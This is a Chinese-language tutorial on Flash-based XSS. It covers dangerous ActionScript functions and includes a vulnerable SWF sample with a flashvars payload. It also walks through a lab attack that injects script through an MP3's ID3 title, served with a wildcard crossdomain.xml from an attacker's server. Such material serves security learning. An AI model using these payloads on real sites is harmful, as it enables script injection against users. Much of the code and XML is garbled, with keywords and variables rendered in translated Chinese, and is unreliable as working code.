Flash XSS漏洞快速上手

 

0x01 Flash XSS

xss一是指执行恶意js，那么为什么说flash xss呢？是因为flash有可以调用js的函数，也就是可以和js通信，因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有：getURL，navigateToURL，ExternalInterface.call，htmlText，loadMovie等等

0x02 ExternalInterface.call举例

AS中ExternalInterface类是用来和js通信的，调用方法是用来调用js函数的，函数原型

ExternalInterface.call（functionName：字符串，...参数）：*
 
     fuctionName：要调用的JavaScript的函数名
 
     参数：参数，可选

函数具体用法请参考

http://help.adobe.com/zh_CN/FlashPlatform/reference/actionscript/3/flash/external/ExternalInterface.html

如下AS代码

包

{import flash.display.Sprite; import flash.external.ExternalInterface; 公共类XSSTest扩展了Sprite
 
       {public function XSSTest（）
 
             {var jsFunction：String = loaderInfo.parameters.jsFunction; var param：String =“abc”;
 
                    ExternalInterface.call（jsFunction，param）;
 
             }
 
       }
 
}

这里通过flashvars传递了一个参数，是js的函数。这种方式比较常见，swf可以做成通用，放到不同的业务中使用，每次只需要传入对应的js函数即可。但是，这里就存在漏洞了。

在浏览器中，构造URL：

XSSTest.swf jsFunction =alert(/xss/) 

访问SWF，并以获取参数的形式传入Flash变数，造成了 XSS

0×03实践

这是一个简单的网页，里边有flash做的MP3播放器。

我们先黑盒看一下：

查看网络

加载了swf，查看源码

看到MP3参数传递的是MP3文件。我们尝试从URL传递参数访问http://192.168.6.2/_files/XSSC1.swf?mp3=../1.mp3

看控制台，有奇怪的输出。

把MP3文件下载下来分析一下

http://192.168.6.2/1.mp3

保存下来

右键属性看摘要

这个文件的标题就是console的输出，由此我们推测为文件里源码有调用js函数console.log（“MP3的标题”） ;

既然是教程，那我们就白盒看一下这个SWF的源码：

包

{
 
    import flash.events。*;
 
    import flash.display。*;
 
    import flash.media。*;
 
    import flash.external。*;
 
    import flash.net。*;
 
    import flash.system。*;
 
    公共类XSSC1扩展Sprite {
 
       private var m：声音;
 
       公共功能XSSC1（）{
 
           var mp3：* = null;
 
           var host：* = null;
 
           var u：* = null;
 
           var context：* = null;
 
           超（）;
 
           var p：* = this.loaderInfo.parameters;
 
           if（（“mp3”in p））{
 
               mp3 = p [“mp3”];
 
               host =（（mp3.match（/ ^（https？：\ / \ / [^ \\\ /] +）/））||（[“”，“”]））[1];
 
               Security.loadPolicyFile（（host +“/ crosdomain.xml”））;
 
               u = new URLRequest（mp3）;
 
               context = new SoundLoaderContext（1000，true）;
 
               m = new Sound（）;
 
               m.load（你，上下文）;
 
               m.play（）;
 
               m.addEventListener（Event.ID3，function（e：Event）：void {
 
                   if（（m.id3中的“songName”））{
 
                       if（ExternalInterface.available）{
 
                           迹（m.id3.songName）;
 
                           ExternalInterface.call（“console.log”，m.id3.songName）;
 
                       };
 
                   };
 
               }）;
 
           };
 
        }
 
    }
 
}//包

那么，我们本地搭建web服务器，构造MP3标题即可触发xss。

首先我们本地创建的Web服务器根目录

把刚才下载的MP3复制进去，然后创建crossdomain.xml的文件，内容

<？xml version =“1.0”？>
 
<！ -  http://www.foo.com/crossdomain.xml  - >
 
<！DOCTYPE跨域策略系统“http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd”>
 
<跨域策略>
 
 <allow-access-from domain =“*”/>
 
         <site-control allowed-cross-domain-policies =“all”/>
 
 <allow-http-request-headers-from domain =“*”headers =“*”/>
 
</跨域策略>

然后我们修改1.MP3的标题为\“））; alert（1）;} catch（a）{} //，右键属性

在cmd 里切换到web 目录，执行C：\ Python27 \ python -m SimpleHTTPServer 80 开启web 服务器

然后访问http://192.168.6.2/_files/XSSC1.swf?mp3=http://192.168.5.66/1.mp3

成功XSS